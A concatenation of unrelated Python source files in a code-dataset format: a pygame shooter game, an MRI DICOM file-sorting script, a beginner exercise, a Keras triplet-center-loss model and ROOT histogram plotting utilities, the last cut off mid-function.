            self.dy = -1
        if keystate[pygame.K_DOWN]:
            self.dy = 1
        if keystate[pygame.K_LEFT]:
            self.dx = -1
        if keystate[pygame.K_RIGHT]:
            self.dx = 1
        if keystate[pygame.K_SPACE]:
            #self.shoot()
            pass
        x = self.rect.centerx + (self.speed * self.dx)
        y = self.rect.centery + (self.speed * self.dy)
        self.rect.center = (x,y)
    def choose_animation(self):
        """Build the animation key ('up', 'downleft', ...) from dx/dy.

        Returns '' when dx == dy == 0 (standing still).
        NOTE(review): diagonal keys such as 'upleft' must exist in the sprite
        json, otherwise update() would KeyError -- confirm against the assets.
        """
        action = ''
        if self.dy == -1:
            action += 'up'
        if self.dy == 1:
            action += 'down'
        if self.dx == -1:
            action += 'left'
        if self.dx == 1:
            action += 'right'
        return action
    def endlife(self):
        """Switch to the death animation; update() kills the sprite when it ends."""
        self.frame_rate = 60
        self.gameover = True
        self.action = 'die'
        self.frame = 0
    def update(self):
        """Per-tick state update: move (unless dying), pick the animation for
        the current direction, and advance the animation frame."""
        if not self.gameover:
            self.move() # update dx and dy
            old_action = self.action
            # use dx and dy to pick action (direction)
            self.action = self.choose_animation()
            if self.action == '':
                # standing still: keep facing the previous direction, frame 0
                self.action = old_action
                center = self.rect.center
                self.image = self.sprites[old_action][0]
                self.rect = self.image.get_rect()
                self.rect.center = center
                return
        self.image = self.sprites[self.action][self.frame]
        now = pygame.time.get_ticks() # get current game clock
        if now - self.last_update > self.frame_rate: #
            self.last_update = now
            self.frame += 1
            if self.frame == len(self.sprites[self.action]):
                self.frame = 0
                if self.gameover:
                    # death animation finished: remove the player sprite
                    self.kill()
            else:
                center = self.rect.center
                self.image = self.sprites[self.action][self.frame]
                self.rect = self.image.get_rect()
                self.rect.center = center
    def shoot(self,target):
        """Spawn a Bullet1 aimed at target (x, y) if shoot_delay ms have
        elapsed; returns the bullet, or None while still on cooldown."""
        now = pygame.time.get_ticks()
        if now - self.last_shot > self.shoot_delay:
            self.last_shot = now
            bullet = Bullet1(self.rect.centerx, self.rect.centery,target[0],target[1])
            self.shoot_sound.play()
            return bullet
        return None
class Mob(pygame.sprite.Sprite):
    """Enemy sprite that bounces around inside the game window."""
    def __init__(self, **kwargs):
        """kwargs: path (required image path), loc (spawn center, default
        random inside the window), new_size (scale target, default (10, 15))."""
        pygame.sprite.Sprite.__init__(self)
        self.game_width = config['window_size']['width']
        self.game_height = config['window_size']['height']
        self.new_size = kwargs.get('new_size', (10, 15))
        # image path is mandatory; bail out if missing
        path = kwargs.get('path', None)
        self.center = kwargs.get('loc', (random.randint(10, self.game_width-10), random.randint(10, self.game_height-10)))
        if not path:
            print("Error: Need path of sprites!")
            sys.exit(0)
        self.image = pygame.image.load(os.path.join(path))
        self.image = pygame.transform.scale(self.image, self.new_size)
        self.rect = self.image.get_rect()
        self.rect.center = self.center
        self.dx = 0
        self.dy = 0
        # make sure items aren't motionless; the original tested
        # dx + dy == 0, which also (wrongly) discarded the valid diagonal
        # directions (1, -1) and (-1, 1)
        while self.dx == 0 and self.dy == 0:
            self.dx = random.choice([-1, 0, 1])
            self.dy = random.choice([-1, 0, 1])
        self.speed = 3  # was assigned twice in the original; duplicate removed
    def update(self):
        """Move one step, reflecting the direction at the window edges."""
        if self.rect.centerx <= 0 or self.rect.centerx >= self.game_width:
            self.dx *= -1
        if self.rect.centery <= 0 or self.rect.centery >= self.game_height:
            self.dy *= -1
        x = self.rect.centerx + (self.speed * self.dx)
        y = self.rect.centery + (self.speed * self.dy)
        self.rect.center = (x, y)
class Bullet2(pygame.sprite.Sprite):
    """Placeholder bullet type; body intentionally left unimplemented."""
    def __init__(self, **kwargs):
        # Initiate this sprite
        pygame.sprite.Sprite.__init__(self)
        # Project Assignment Part 4 !!
class Bullet1(pygame.sprite.Sprite):
    """Projectile that travels in a straight line from (x, y) toward
    (target_x, target_y) and despawns when it leaves the window."""
    def __init__(self, x, y, target_x, target_y):
        pygame.sprite.Sprite.__init__(self)
        self.x, self.y = x, y
        self.target_x, self.target_y = target_x, target_y
        self.game_width = config['window_size']['width']
        self.game_height = config['window_size']['height']
        self.image = pygame.image.load(config['images']['green_bullet']['path'])
        self.rect = self.image.get_rect()
        # muzzle position: bottom edge at y, centered horizontally on x
        self.rect.bottom = y
        self.rect.centerx = x
        self.speed = 10
        self.angle = self.CalcDirection()  # fixed for the bullet's lifetime
    def CalcDirection(self):
        """Return the firing angle in radians from the muzzle to the target."""
        return math.atan2(self.target_y - self.y, self.target_x - self.x)
    def offWorld(self):
        """True once the bullet has fully left the game window."""
        r = self.rect
        return (r.bottom < 0 or r.right < 0
                or r.left > self.game_width or r.top > self.game_height)
    def update(self):
        """Advance one step along the stored angle; kill when off screen."""
        step_x = int(self.speed * math.cos(self.angle))
        step_y = int(self.speed * math.sin(self.angle))
        self.rect.x += step_x
        self.rect.y += step_y
        # kill if it moves off the screen
        if self.offWorld():
            self.kill()
def main():
    """Set up pygame, spawn the player and ten mobs, then run the
    event / update / collide / draw loop until the window is closed."""
    pygame.init()
    # sets the window title
    pygame.display.set_caption(config['title'])
    # Game size of game window from config
    width = config['window_size']['width']
    height = config['window_size']['height']
    # Set up the drawing window
    screen = pygame.display.set_mode((width,height))
    # load our background
    background = pygame.image.load(config['background'])
    # sprite group to handle all the visuals
    all_sprites = pygame.sprite.Group()
    mob_group = pygame.sprite.Group()
    player_group = pygame.sprite.Group()
    bullets_group = pygame.sprite.Group()
    # help control event timing
    clock = pygame.time.Clock()
    player = Player(player_sprites=config['sprite_sheets']['pac_man_orange']['path'],loc=(random.randint(0,width),random.randint(0,height)))
    player_group.add(player)
    # ten enemies at random spawn points
    for i in range(10):
        m = Mob(path=config['images']['bad_guy']['path'],new_size=(20,30))
        mob_group.add(m)
        all_sprites.add(m)
    all_sprites.add(player)
    # Setup for sounds. Defaults are good.
    pygame.mixer.init()
    # pygame.mixer.music.load("./media/sounds/game_track.ogg")
    game_track = pygame.mixer.Sound(config['sounds']['game_track'])
    kill_sound = pygame.mixer.Sound(config['sounds']['kill_sound'])
    head_shot = pygame.mixer.Sound(config['sounds']['head_shot'])
    #pygame.mixer.sound.play()
    game_track.set_volume(0.5)
    game_track.play(loops=-1)   # loop the soundtrack forever
    # Run until the user asks to quit
    # game loop
    running = True
    while running:
        clock.tick(config['fps'])   # cap the frame rate
        # fill screen with white
        screen.fill(colors['white'])
        # show background grid (no moving it)
        screen.blit(background, (0,0))
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            if event.type == pygame.KEYDOWN:
                event.key
            if event.type == pygame.KEYUP:
                event.key
            if event.type == pygame.MOUSEMOTION:
                pass
            if event.type == pygame.MOUSEBUTTONUP:
                # fire toward the click; shoot() is rate-limited, may be None
                bullet = player.shoot(pygame.mouse.get_pos())
                if bullet:
                    all_sprites.add(bullet)
                    bullets_group.add(bullet)
                #shoot_sound.play()
        all_sprites.update()
        # mobs that touch the player are removed
        for item in mob_group:
            gets_hit = pygame.sprite.collide_rect(item, player)
            if gets_hit:
                item.kill()
        # check to see if a bullet hit a mob
        hits = pygame.sprite.groupcollide(mob_group, bullets_group, True, True)
        for hit in hits:
            # explosion at the dead mob's position
            e = Explosion(fx_sprites=config['sprite_sheets']['explosion_04']['path'],loc=hit.rect.center)
            print(hit)
            kill_sound.play()
            all_sprites.add(e)
        all_sprites.draw(screen)
        pygame.display.flip()
    # Done! Time to quit.
    pygame.quit()
# Start the game only when this file is run directly, not on import.
if __name__=='__main__':
    main()
| [
"[email protected]"
] | |
ec9d3ab0161bd0be2d1d9cc810b7baf064cb9258 | 0c110eb32f2eaea5c65d40bda846ddc05757ced6 | /scripts/mastersort/scripts_dir/p7477_run1L6.py | fd95e6f425fc95d1d5f1740df9048f4676b66a4c | [] | no_license | nyspisoccog/ks_scripts | 792148a288d1a9d808e397c1d2e93deda2580ff4 | 744b5a9dfa0f958062fc66e0331613faaaee5419 | refs/heads/master | 2021-01-18T14:22:25.291331 | 2018-10-15T13:08:24 | 2018-10-15T13:08:24 | 46,814,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,199 | py | from __future__ import with_statement
import os, csv, shutil,tarfile, uf, dcm_ops
dest_root = '/ifs/scratch/pimri/soccog/test_working'
dst_path_lst = ['7477', 'run1L6']
uf.buildtree(dest_root, dst_path_lst)
uf.copytree('/ifs/scratch/pimri/soccog/old/SocCog_Raw_Data_By_Exam_Number/2539/E2539_e2401779/s2411337_1904_1L6_s10', '/ifs/scratch/pimri/soccog/test_working/7477/run1L6')
t = tarfile.open(os.path.join('/ifs/scratch/pimri/soccog/test_working/7477/run1L6','MRDC_files.tar.gz'), 'r')
t.extractall('/ifs/scratch/pimri/soccog/test_working/7477/run1L6')
for f in os.listdir('/ifs/scratch/pimri/soccog/test_working/7477/run1L6'):
if 'MRDC' in f and 'gz' not in f:
old = os.path.join('/ifs/scratch/pimri/soccog/test_working/7477/run1L6', f)
new = os.path.join('/ifs/scratch/pimri/soccog/test_working/7477/run1L6', f + '.dcm')
os.rename(old, new)
qsub_cnv_out = dcm_ops.cnv_dcm('/ifs/scratch/pimri/soccog/test_working/7477/run1L6', '7477_run1L6', '/ifs/scratch/pimri/soccog/scripts/mastersort/scripts_dir/cnv')
#qsub_cln_out = dcm_ops.cnv_dcm('/ifs/scratch/pimri/soccog/test_working/7477/run1L6', '7477_run1L6', '/ifs/scratch/pimri/soccog/scripts/mastersort/scripts_dir/cln')
| [
"[email protected]"
] | |
f0e45b1fb4b83b8df90170a17ff2e2c3e5ee84de | 7d8b5220152b4ef4876c489d6648be56bc83c8e7 | /exercises/development/beginner/exercise_12.py | 78175e5a2f27eacb75544c488c37742e2dba2c08 | [
"CC-BY-4.0",
"ISC",
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | comp-think/comp-think.github.io | 8f89518e7a463376b431f55fb7f495cb3019d4a5 | e48a7ecf3b1799471271e01430e089e8f8e3c68d | refs/heads/master | 2023-01-04T20:38:27.593237 | 2023-01-02T14:48:54 | 2023-01-02T14:48:54 | 157,171,226 | 52 | 22 | NOASSERTION | 2023-01-02T14:48:55 | 2018-11-12T07:11:23 | Python | UTF-8 | Python | false | false | 1,189 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, Silvio Peroni <[email protected]>
#
# Permission to use, copy, modify, and/or distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright notice
# and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
# DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
# SOFTWARE.
# Test case for the function
def test_f(n1, n2, expected):
    """Return True when f(n1, n2) produces the expected list, else False."""
    return f(n1, n2) == expected
# Code of the function
def f(n1, n2):
    """Return list(range(d)), where d is the absolute difference of n1 and n2."""
    return list(range(abs(n1 - n2)))
# Tests
print(test_f(3, 4, [0]))
print(test_f(4, 2, [0, 1]))
print(test_f(9, 0, [0, 1, 2, 3, 4, 5, 6, 7, 8]))
| [
"[email protected]"
] | |
ad38a8f2cb5608beb486c95d05efd28affd3e33f | 2bccab3cea54fdf283533d91b4a88363847b565d | /triple-center-loss/triple_center_model.py | 50bfb7111808affc301bed6a03c61cf867c47ae2 | [] | no_license | AmberzzZZ/classification_keras | 647727597cc086cc72f532583ad80c6d88ecdce8 | 8e1886f130452b0f5ad30f7e9a32eb8388babb9a | refs/heads/master | 2020-08-28T22:51:53.832386 | 2020-05-26T02:35:44 | 2020-05-26T02:35:44 | 217,844,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,274 | py | from models import *
from keras.layers import Embedding, Lambda
import tensorflow as tf
from keras.utils import to_categorical
from keras.utils import plot_model
def TCL(y_true, y_pred):
    """Pass-through Keras loss: the model's second output already *is* the
    triplet-center loss tensor, so just return it (y_true is a dummy)."""
    loss = y_pred
    return loss
def l2distance(args, n_classes):
    """Lambda-layer body for the triplet-center loss.

    args: (embedding, center_standard, y_true) -- the batch embeddings, the
    per-class center vectors, and the integer class labels.
    Returns [intra_distance, min_inter_distance]: the squared L2 distance of
    each embedding to its own class center, and to the nearest wrong center.
    """
    embedding, center_standard, y_true = args
    n_centers = center_standard.shape[0]
    lst = []
    # squared L2 distance from each embedding to every class center
    for i in range(n_centers):
        lst.append(K.sum(K.square(embedding-center_standard[i,0,:]), 1, keepdims=True))
    distances = K.concatenate(lst, axis=1)
    classes = K.arange(0, n_classes, dtype=tf.float32)
    y_true = K.repeat_elements(y_true, n_classes, axis=1)
    # one-hot mask of each sample's true class
    mask = K.cast(K.equal(y_true, classes), dtype=tf.float32)
    # distance to the nearest *wrong* center (true-class entry masked to inf)
    inter_distances = tf.where(tf.equal(mask, 0.0), distances, np.inf*tf.ones_like(mask))
    min_inter_distance = tf.math.reduce_min(inter_distances, axis=1, keepdims=True)
    # distance to the *true* center (all other entries masked to inf)
    intra_distances = tf.where(tf.equal(mask, 1.0), distances, np.inf*tf.ones_like(mask))
    intra_distance = tf.math.reduce_min(intra_distances, axis=1, keepdims=True)
    return [intra_distance, min_inter_distance]
def sharedEmbedding(n_classes, embedding_size, x):
    """Look up a trainable center vector of size embedding_size for each
    integer label in x (one row per class)."""
    lookup = Embedding(n_classes, embedding_size)
    return lookup(x)
def triple_center_model(lr=3e-4, input_shape=(512,512,1), n_classes=10, m=4):
    """Build the two-headed model: a softmax classifier plus a triplet-center
    loss branch with margin m. Inputs are [image, label, standard-label] and
    outputs are [softmax, triplet_center_loss]."""
    x_input = Input(shape=input_shape)
    basemodel = base_model(input_shape)
    embedding = basemodel(x_input) # (None,100)
    # cls branch
    softmax = Dense(n_classes, activation='softmax')(embedding) # dense3
    # center branch
    embedding_size = embedding.shape.as_list()[-1] # 100: the outdim of dense1
    y_input = Input((1,))
    # ##### past calculation of l2_loss, keep to compare ####
    # center = sharedEmbedding(n_classes, embedding_size, y_input)
    # l2_loss = Lambda(lambda x: K.sum(K.square(x[0] - x[1][:, 0]), 1, keepdims=True), name='l2_loss')([embedding, center])
    # #####
    # constant tensor of all class labels, used to embed every class center
    labels = np.arange(n_classes).reshape([-1,1])
    y_standard_input = Input(tensor=K.constant(labels)) # (10,1) assume n_classes=10
    center_standard = sharedEmbedding(n_classes, embedding_size, y_standard_input) # (10, 1, 100)
    intra_distance, min_inter_distance = Lambda(l2distance, arguments={'n_classes': n_classes},
                                                name='l2distance')([embedding, center_standard, y_input])
    # hinge: max(d(x, own center) + m - d(x, nearest other center), 0)
    triplet_center_loss = Lambda(lambda x: K.maximum(x[0]+m-x[1],0),
                                 name='triple_center_loss')([intra_distance, min_inter_distance])
    model = Model(inputs=[x_input, y_input, y_standard_input], outputs=[softmax, triplet_center_loss])
    sgd = SGD(lr, momentum=0.9, decay=1e-6, nesterov=True)
    adam = Adam(lr, beta_1=0.9, beta_2=0.999)
    model.compile(optimizer=adam,
                  loss=['categorical_crossentropy', TCL],
                  metrics=['acc']) # loss_weights
    return model
# Training driver: load grayscale patches, one-hot the labels, and fit the
# two-headed model; the TCL head consumes a dummy all-zeros target.
if __name__ == '__main__':
    train_path = "data/train/"
    val_path = "data/val/"
    n_classes = 3
    target_size = 28
    batch_size = 128
    x_train, y_train = loadData(train_path, target_size)  # project helper
    x_train = np.expand_dims(x_train, axis=-1)            # add channel dim
    y_train = to_categorical(y_train, num_classes=n_classes)
    print(x_train.shape, y_train.shape)
    model = triple_center_model(lr=3e-4, input_shape=(target_size,target_size,1), n_classes=n_classes)
    # plot_model(model, to_file='triple_center_model.png', show_shapes=True, show_layer_names=True)
    filepath = "./triple_center_model_{epoch:02d}_val_acc_{dense_2_acc:.3f}.h5"
    checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')
    # dummy labels/targets for the triplet-center branch
    y_dummy = np.zeros((x_train.shape[0], 1))
    model.fit(x=[x_train, y_dummy],
              y=[y_train, y_dummy],
              batch_size=batch_size,
              epochs=100, verbose=1,
              callbacks=[checkpoint],
              validation_split=0.2)
    # Inference example, kept for reference:
    # model.load_weights('triple_center_model_01_val_acc_0.981.h5', by_name=True)
    # img = cv2.imread("data/test/d2/d2_0002.png", 0)
    # img = cv2.resize(img, (target_size, target_size))
    # tmp = np.reshape(img, (1, target_size, target_size, 1))
    # dummy = np.array([1])
    # preds = model.predict([tmp, dummy])[0]
    # print(preds)
    # label = np.argmax(preds)
    # print(label)
| [
"[email protected]"
] | |
2f810088c1d7c89839e81cd9c11e22c2d9e2f920 | 1185c629b091e09366aec9830d09ecd1b51dddda | /eval.py | 7fee4cd1b8819c5d70a410ec118be451f76e6231 | [] | no_license | billy-inn/refe | 9ed79b8cfed83225cbc81a8637d0bafc24e0e494 | deeaa1934ea7011e22dc7d3d98eedd6144212c7e | refs/heads/master | 2021-07-03T20:26:47.329020 | 2017-09-24T02:33:16 | 2017-09-24T02:33:16 | 104,605,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 946 | py | import tensorflow as tf
import numpy as np
import pandas as pd
import config
from optparse import OptionParser
from task import Task
import logging
from model_param_space import param_space_dict
def train(model_name, data_name, params_dict, logger):
    """Instantiate a Task for (model, data) with the given hyper-parameters
    and refit it on the full training set."""
    Task(model_name, data_name, 1, params_dict, logger).refit()
def parse_args(parser):
    """Attach the -m/--model and -d/--data options to parser and parse
    sys.argv; returns the (options, args) pair from optparse."""
    parser.add_option("-m", "--model", dest="model_name", type="string", default="best_TransE_L2")
    parser.add_option("-d", "--data", dest="data_name", type="string", default="wn18")
    return parser.parse_args()
def main(options):
    """Configure INFO-level root logging, then retrain the selected model on
    the selected dataset using its stored hyper-parameters."""
    root_logger = logging.getLogger()
    logging.basicConfig(format='[%(asctime)s] %(levelname)s: %(message)s', level=logging.INFO)
    train(options.model_name, options.data_name,
          params_dict=param_space_dict[options.model_name], logger=root_logger)
# Script entry point: build the option parser, read CLI args, run training.
if __name__ == "__main__":
    parser = OptionParser()
    options, args = parse_args(parser)
    main(options)
| [
"[email protected]"
] | |
432654325fa3c3e4ef2b5dea97f3ff81125a84ac | 52f8d1c53d7a7a251b216cacc2d1aaa8cc60c33e | /tools/utils.py | edef9d3436684af263ef426b90366eae0859b595 | [] | no_license | sbein/BayesQcd2019 | d9ecbf252b336f1d18c9dd35828bde1331a0028a | bb259e6d95e7eeee8d655866cbb7eeaa3e476036 | refs/heads/master | 2022-02-22T20:24:19.008157 | 2019-08-08T07:53:44 | 2019-08-08T07:53:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,416 | py | from ROOT import *
from array import array
tl = TLatex()
tl.SetNDC()
cmsTextFont = 61
extraTextFont = 50
lumiTextSize = 0.6
lumiTextOffset = 0.2
cmsTextSize = 0.75
cmsTextOffset = 0.1
regularfont = 42
originalfont = tl.GetTextFont()
epsi = "#scale[1.3]{#font[122]{e}}"
epsilon = 0.0001
binning = {}
binning['Met']=[45,0,450]
binning['HardMet']=binning['Met']
binning['MetSignificance']=[0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7, 2.8, 2.9, 3.0, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6, 3.7, 3.8, 3.9, 4.0, 4.1, 4.2, 4.3, 4.4, 4.5, 4.6, 4.7, 4.8, 4.9, 5.0, 5.1, 5.2, 5.3, 5.4, 5.5, 5.6, 5.7, 5.8, 5.9, 6.0, 6.1, 6.2, 6.3, 6.4, 6.5, 6.6, 6.7, 6.8, 6.9, 7.0, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6, 8.7, 8.8, 8.9, 9.0, 9.1, 9.2, 9.3, 9.4, 9.5, 9.6, 9.7, 9.8, 9.9, 10.0, 10.1, 10.2, 10.3, 10.4, 10.5, 10.6, 10.7, 10.8, 10.9, 11.0, 11.1, 11.2, 11.3, 11.4, 11.5, 11.6, 11.7, 11.8, 11.9, 12.0]
binning['NJets']=[10,0,10]
binning['NLeptons']=[5,0,5]
binning['NElectrons']=binning['NLeptons']
binning['NPhotons']=binning['NLeptons']
binning['NMuons']=binning['NLeptons']
binning['NTags']=[3,0,3]
binning['NPix']=binning['NTags']
binning['NPixStrips']=binning['NTags']
binning['BTags']=[4,0,4]
binning['Ht']=[10,0,2000]
binning['St']=binning['Ht']
binning['MinDPhiHardMetJets'] = [16,0,3.2]
binning['DPhiPhoPho'] = [16,0,3.2]
binning['DPhi1']=[16,0,3.2]
binning['DPhi2']=[16,0,3.2]
binning['DPhi3']=[16,0,3.2]
binning['DPhi4']=[16,0,3.2]
binning['Track1MassFromDedx'] = [25,0,1000]
binning['BinNumber'] = [34,0,34]
binning['MinDeltaPhi'] = binning['DPhi1']
binningUser = dict(binning)
binningUser['HardMet'] = [0,10,20,30,40,50,60,70,80,90,100,110,120,130,140,150,160,170,180,200,250,450]
#binningUser['HardMet'] = [15,0,300]
#binningUser['HardMet'] = [30,20,920]
binning_templates = {}
binning_templates['HardMet']=[300,0,600]
binning_templates['HardMet']=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,130,132,134,136,138,140,142,144,146,148,150,155,160,165,170,175,180,185,190,195,200,220,240,260,280,300,400,500,800]
binning_templates['Met']=binning_templates['HardMet']
binning_templates['MetSignificance']=binning['MetSignificance']
binning_templates['Ht']=[0,300,500,700,1000,1500,2000,10000]
binning_templates['Ht']=[0,200,300,500,700,1000,1500,2000,10000]#NOV2016 removed "400"
binning_templates['Ht']=[1,0,10000]# in delphes, no apparent dependence of gen-MHT on HT
binning_templates['St']=binning['Ht']
binning_templates['NJets']=[10,0,10]
binning_templates['BTags']=[0,1,2,5]
binning_templates['Jet1Pt']=[20,0,800]
binning_templates['Jet1Eta']=[20,-3,3]
binning_templates['Jet2Pt']=[20,0,800]
binning_templates['Jet2Eta']=[20,-3,3]
binning_templates['Jet3Pt']=[20,0,800]
binning_templates['Jet3Eta']=[20,-3,3]
binning_templates['Jet4Pt']=[20,0,800]
binning_templates['Jet4Eta']=[20,-3,3]
binning_templates['DPhi1']=[126,0,3.15]
#binning_templates['DPhi1']=[126,-3.15,3.15]
binning_templates['DPhi2']=binning_templates['DPhi1']
binning_templates['DPhi3']=binning_templates['DPhi1']
binning_templates['DPhi4']=binning_templates['DPhi1']
binning_templates['MaxHemJetPt']=[20,0,100]
binning_templates['DPhiPhoPho'] = [16,0,3.2]
def histoStyler(h, color=kBlack):
    """Apply the standard cosmetics to a ROOT histogram: line/marker color,
    font 132 axes at size 0.059, title offsets, and enable Sumw2 errors."""
    h.SetLineWidth(2)
    h.SetLineColor(color)
    h.SetMarkerColor(color)
    #h.SetFillColor(color)
    axis_size, axis_font = 0.059, 132
    for axis in (h.GetXaxis(), h.GetYaxis()):
        axis.SetLabelFont(axis_font)
        axis.SetTitleFont(axis_font)
        axis.SetTitleSize(axis_size)
        axis.SetLabelSize(axis_size)
    h.GetXaxis().SetTitleOffset(1.0)
    h.GetYaxis().SetTitleOffset(1.05)
    if not h.GetSumw2N():
        h.Sumw2()
def makeHist(name, title, nb, low, high, color):
    """Book a styled TH1F with nb uniform bins on [low, high]."""
    hist = TH1F(name, title, nb, low, high)
    histoStyler(hist, color)
    return hist
def makeTh1(name, title, nbins, low, high, color=kBlack):
    """Book a styled fixed-bin TH1F (default color black)."""
    hist = TH1F(name, title, nbins, low, high)
    histoStyler(hist, color)
    return hist
def makeTh1VB(name, title, nbins, arrayOfBins):
    """Book a styled variable-binning TH1F from a list of bin edges.

    Bug fix: the original passed np.asarray(...), but numpy is never imported
    in this module (only `from ROOT import *` and `from array import array`),
    so calling it raised NameError. Use array('d', ...) as mkHistoStruct does.
    """
    h = TH1F(name, title, nbins, array('d', arrayOfBins))
    histoStyler(h, 1)
    return h
def makeTh2(name, title, nbinsx, lowx, highx, nbinsy, lowy, highy):
    """Book a styled TH2F with uniform binning in both x and y."""
    hist2d = TH2F(name, title, nbinsx, lowx, highx, nbinsy, lowy, highy)
    histoStyler(hist2d)
    return hist2d
def makeTh2VB(name, title, nbinsx, arrayOfBinsx, nbinsy, arrayOfBinsy):
    """Book a styled TH2F with variable bin edges in x and y.

    Bug fix: as in makeTh1VB, the original used np.asarray although numpy is
    never imported in this module (NameError at call time); use array('d', ...).
    """
    h = TH2F(name, title, nbinsx, array('d', arrayOfBinsx), nbinsy, array('d', arrayOfBinsy))
    histoStyler(h)
    return h
def graphStyler(g, color):
    """Apply the standard cosmetics to a ROOT graph: line/marker color and
    font 132 axes at size 0.055 (slightly smaller than histoStyler's 0.059)."""
    g.SetLineWidth(2)
    g.SetLineColor(color)
    g.SetMarkerColor(color)
    #g.SetFillColor(color)
    axis_size, axis_font = 0.055, 132
    for axis in (g.GetXaxis(), g.GetYaxis()):
        axis.SetLabelFont(axis_font)
        axis.SetTitleFont(axis_font)
        axis.SetTitleSize(axis_size)
        axis.SetLabelSize(axis_size)
    g.GetXaxis().SetTitleOffset(1.0)
    g.GetYaxis().SetTitleOffset(1.05)
def mkcanvas(name='c1'):
    """Create a 750x630 TCanvas with the standard bottom/left margins."""
    canvas = TCanvas(name, name, 750, 630)
    canvas.SetBottomMargin(.15)
    canvas.SetLeftMargin(.14)
    return canvas
def mkcanvas_wide(name):
    """Create a 1200x700 TCanvas split into two side-by-side pads, each with
    the standard margins and grid lines enabled."""
    canvas = TCanvas(name, name, 1200, 700)
    canvas.Divide(2, 1)
    for ipad in (1, 2):
        pad = canvas.GetPad(ipad)
        pad.SetBottomMargin(.14)
        pad.SetLeftMargin(.14)
        pad.SetGridx()
        pad.SetGridy()
    return canvas
def mklegend(x1=.22, y1=.66, x2=.69, y2=.82, color=kWhite):
    """Create a transparent, borderless TLegend at the given NDC corners."""
    legend = TLegend(x1, y1, x2, y2)
    legend.SetFillColor(color)
    legend.SetTextFont(42)
    legend.SetBorderSize(0)
    legend.SetShadowColor(kWhite)
    legend.SetFillStyle(0)
    return legend
def mklegend_(x1=.22, y1=.66, x2=.69, y2=.82, color=kWhite):
    """Create a transparent, borderless TLegend at the given NDC corners.

    NOTE(review): byte-for-byte duplicate of mklegend above; kept because
    callers may reference either name -- consider consolidating.
    """
    lg = TLegend(x1, y1, x2, y2)
    lg.SetFillColor(color)
    lg.SetTextFont(42)
    lg.SetBorderSize(0)
    lg.SetShadowColor(kWhite)
    lg.SetFillStyle(0)
    return lg
def fillth1(h,x,weight=1):
    # Fill h at x with weight, clamping x into the visible axis range so that
    # under/overflow entries land in the first/last bin (epsilon keeps the
    # clamped value strictly inside the edge).
    h.Fill(min(max(x,h.GetXaxis().GetBinLowEdge(1)+epsilon),h.GetXaxis().GetBinLowEdge(h.GetXaxis().GetNbins()+1)-epsilon),weight)
def fillth2(h,x,y,weight=1):
    # 2D analogue of fillth1: clamp both x and y into the visible axis ranges
    # so that under/overflow entries land in the edge bins.
    h.Fill(min(max(x,h.GetXaxis().GetBinLowEdge(1)+epsilon),h.GetXaxis().GetBinLowEdge(h.GetXaxis().GetNbins()+1)-epsilon), min(max(y,h.GetYaxis().GetBinLowEdge(1)+epsilon),h.GetYaxis().GetBinLowEdge(h.GetYaxis().GetNbins()+1)-epsilon),weight)
def findbin(thebins, value):
    """Return the (low, high) bin from thebins that contains value.

    thebins is an ordered list of (low, high) pairs. Out-of-range values are
    clamped: above the last bin returns the last bin, below the first bin
    returns the first bin.
    """
    for b in thebins:
        if value >= b[0] and value <= b[1]:
            return b
    # Bug fix: the original compared `value` against the bin *pair* itself
    # (number-vs-list comparison). In Python 2 that made `value > thebins[-1]`
    # always False and `value < thebins[0]` always True, so every unmatched
    # value returned the first bin; in Python 3 it raises TypeError.
    # Compare against the numeric edges instead.
    if value > thebins[-1][1]:
        return thebins[-1]
    if value < thebins[0][0]:
        return thebins[0]
def namewizard(name):
    """Map an internal observable name to its ROOT-LaTeX axis label;
    unknown names are returned unchanged."""
    labels = {
        'HardMet': r'E_{T}^{miss} [GeV]',
        'Met': r'E_{T}^{miss} [GeV]',
        'Ht': r'H_{T} [GeV]',
        'NJets': r'n_{j}',
        'BTags': r'n_{b}',
        'MinDPhiHardMetJets': r'#Delta#phi_{min}',
        'NLeptons': r'n_{#ell}',
        'NPhotons': r'n_{#gamma}',
        'NMuons': r'n(#mu)',
        'NTags': r'n_{DT}',
        'SumTagPtOverMet': r'R^{*}',
        'DPhiMetSumTags': r'#Delta#phi^{*}',
        'St': r'H_{T}',
    }
    return labels.get(name, name)
def Struct(*args, **kwargs):
    """Build a lightweight record class.

    Positional names in *args become slots defaulting to None; keyword pairs
    become slots with those defaults (a field named in both args and kwargs
    defaults to None, matching the original update semantics). The reserved
